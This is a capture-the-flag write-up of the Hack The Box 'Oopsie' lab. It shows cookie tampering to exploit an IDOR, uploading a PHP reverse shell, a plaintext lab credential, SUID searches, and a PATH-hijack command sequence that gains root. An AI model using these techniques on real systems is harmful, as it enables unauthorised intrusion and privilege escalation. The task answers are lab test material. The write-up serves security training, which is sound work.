Home Oopsie
Post
Cancel

Oopsie

https://app.hackthebox.com/starting-point A hack the box machine that uses simple IDOR to gain access to file upload to get a reverse shell then use PATH hijacking to gain root.

Task 1 - With what kind of tool can intercept web traffic?

  • proxy burp is a proxy

Task 2 - What is the path to the directory on the webserver that returns a login page?

  • feroxbuster -u http://oopsie.htb -x txt,php -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt then we find /cdn-cgi/login

Task 3 - What can be modified in Firefox to get access to the upload page?

Turning on intercept in burp and capture the request for the guest login.

1
2
3
4
5
6
7
8
9
10
GET /cdn-cgi/login/admin.php HTTP/1.1
Host: oopsie.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://oopsie.htb/cdn-cgi/login/index.php
Connection: close
Cookie: user=2233; role=guest
Upgrade-Insecure-Requests: 1

We are assigned a user and role here. Selecting account and changing the id variable to 1 gives us a simple IDOR and the access ID of the admin user. So admin is user 1 and their access id = 34322.

Task 4 - What is the access ID of the admin user?

34322 We can then capture the request to the upload page and change the corresponsing variables to allow us to access.

Task 5 - On uploading a file, what directory does that file appear in on the server?

assuming this file is uploaded the the /uploads/ folder we found earliar. Send through a php-rev-shell.php and access it to gain a hold. at this point we can grab the user.txt and start privilege escalation.

Task 6 - What is the file that contains the password that is shared with the robert user?

We actually found this file earliar during the feroxbuster. But were unable to view here we can access it and fine his robert’s creds. robert:M3g4C0rpUs3r!

Task 7 - What executible is run with the option “-group bugtracker” to identify all files owned by the bugtracker group?

  • find / -type f -group bugtracker 2>/dev/null
  • find / -type f -perm -u=s 2>/dev/null

Task 8 - Regardless of which user starts running the bugtracker executable, what’s user privileges will use to run?

  • root. ls -las the file

Task 9 - What SUID stands for?

  • Set owner user id

Task 10 - What is the name of the executable being called in an insecure manner?

When we run bugtracker it is calling cat but not from the path, so we should be able to take advantage of this with a PATH highjacking

travel to /tmp and echo "/bin/sh" > cat && chmod +x cat. then we can add the dir to the PATH export PATH=/tmp:$PATH, then run bugtracker.

we can after export the path again and remove tmp to cat root.txt.

This post is licensed under CC BY 4.0 by the author.